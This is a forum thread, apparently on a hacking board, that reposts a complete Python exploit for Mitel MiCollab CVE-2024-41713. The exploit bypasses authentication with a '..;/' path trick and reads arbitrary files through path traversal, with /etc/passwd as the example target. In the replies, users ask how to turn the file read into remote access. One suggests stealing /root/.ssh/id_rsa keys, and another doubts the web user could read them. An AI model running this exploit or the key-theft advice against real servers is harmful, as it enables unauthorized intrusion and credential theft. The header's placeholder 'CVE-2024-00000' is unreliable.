Remote CVE-2024-35286 & CVE-2024-41713 Critical Mitel MiCollab Flaw

[Focus17]

Mitel MiCollab Authentication Bypass to Arbitrary File Read

Юзать

                         __         ___  ___________                   
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                  \/          \/     \/                           

        watchtowr-vs-MiCollab_2024-12-05.py
        (*) Mitel MiCollab Authentication Bypass and Arbitrary File Read exploit by watchTowr
        
          - Sonny, watchTowr (sonny@watchTowr.com)

        CVEs: [CVE-2024-41713 - Authentication Bypass] - [CVE-2024-00000 - Arbitrary File Read]


            Example Usage:
          - python watchtowr-vs-MiCollab_2024-12-05.py --url http://localhost --file /etc/passwd

import requests
import argparse

banner = """             __         ___  ___________                   
     __  _  ______ _/  |__ ____ |  |_\\__    ____\\____  _  ________
     \\ \\/ \\/ \\__  \\    ___/ ___\\|  |  \\|    | /  _ \\ \\/ \\/ \\_  __ \\
      \\     / / __ \\|  | \\  \\___|   Y  |    |(  <_> \\     / |  | \\/
       \\/\\_/ (____  |__|  \\___  |___|__|__  | \\__  / \\/\\_/  |__|   
                  \\/          \\/     \\/                           

        watchtowr-vs-mitel-micollab-cve-2024-41713_2024-12-05.py
        (*) Mitel MiCollab Authentication Bypass and Arbitrary File Read exploit by watchTowr
        
          - Sonny, watchTowr (sonny@watchTowr.com)

        CVEs: [CVE-2024-41713 - Authentication Bypass] - [CVE-2024-00000 - Arbitrary File Read]
"""
helptext =  """
            Example Usage:
          - python watchtowr-vs-mitel-micollab-cve-2024-41713_2024-12-05.py --url http://localhost --file /etc/passwd
             """

parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument("--url", help="target url in the format https://localhost", default=True, action="store", required=True)
parser.add_argument("--file", help="file to dump e.g. /etc/passwd", required=True, action="store")
try:
    args = parser.parse_args()
except:
    print(banner)
    print(helptext)
    raise

print(banner)


requests.urllib3.disable_warnings()

print(f"[*] Target Server: {args.url} ")
print(f"[*] Target File: {args.file} ")

exploit_url = f'{args.url}/npm-pwg/..;/ReconcileWizard/reconcilewizard/sc/IDACall?isc_rpc=1&isc_v=&isc_tnum=2'
exploit_headers = {
    "Content-Type": "application/x-www-form-urlencoded"
}

exploit_file_str = f'<transaction xmlns:xsi="http://www.w3.org/2000/10/XMLSchema-instance" xsi:type="xsd:Object"><transactionNum xsi:type="xsd:long">2</transactionNum><operations xsi:type="xsd:List"><elem xsi:type="xsd:Object"><criteria xsi:type="xsd:Object"><reportName>../../..{args.file}</reportName></criteria><operationConfig xsi:type="xsd:Object"><dataSource>summary_reports</dataSource><operationType>fetch</operationType></operationConfig><appID>builtinApplication</appID><operation>downloadReport</operation><oldValues xsi:type="xsd:Object"><reportName>x.txt</reportName></oldValues></elem></operations><jscallback>x</jscallback></transaction>'

exploit_data = {
    "_transaction": exploit_file_str,
    "protocolVersion":"1.0",
    "__iframeTarget__":"x"
}

pre_check = requests.get(url=f'{args.url}/portal/',verify=False)

if "MiCollab End User Portal" not in pre_check.text:
    print(f"[*] Server is not Mitel MiCollab, exiting...")
    exit()

vuln_check = requests.get(url=f'{args.url}/npm-pwg/..;/usp/',verify=False)

if "<title>Search Users</title>" not in vuln_check.text:
    print(f"[*] Server is Mitel MiCollab, but it's not vulnerable to CVE-2024-41713, exiting...")
    exit()

exploit_request = requests.post(url=exploit_url,verify=False,headers=exploit_headers,data=exploit_data)

print(f"[*] File Dump: {exploit_request.text} ")

 

[jamesbeach]

Thanks a lot
How can i use this cve?
My mean is 'how can i use this cve as rce'. I know that the cve can run with this command: python watchtowr-vs-MiCollab_2024-12-05.py --url http://localhost --file /etc/passwd
I would be grateful if someone could explain the general process of using CVE's. For example, here it only gives us the file /etc/passwd. Can we convert this to access or not?

 

[rwxrwx]

Thanks a lot
How can i use this cve?
My mean is 'how can i use this cve as rce'. I know that the cve can run with this command: python watchtowr-vs-MiCollab_2024-12-05.py --url http://localhost --file /etc/passwd
I would be grateful if someone could explain the general process of using CVE's. For example, here it only gives us the file /etc/passwd. Can we convert this to access or not?

Для удаленного доступа попробуйте сбросить SSH-ключи, которые можно найти в файле /root/.ssh/id_rsa

 

[jamesbeach]

Для удаленного доступа попробуйте сбросить SSH-ключи, которые можно найти в файле /root/.ssh/id_rsa

Could you tell me more about this, or do you have any source for?

 

[MorganBH]

Для удаленного доступа попробуйте сбросить SSH-ключи, которые можно найти в файле /root/.ssh/id_rsa

-, там чтение с правами юзера который запускал веб морду, вроде бы так
и прав не хватит на чтение /root/.ssh/id_rsa

 

[gri]

GitHub - watchtowrlabs/Mitel-MiCollab-Auth-Bypass_CVE-2024-41713

Contribute to watchtowrlabs/Mitel-MiCollab-Auth-Bypass_CVE-2024-41713 development by creating an account on GitHub.

github.com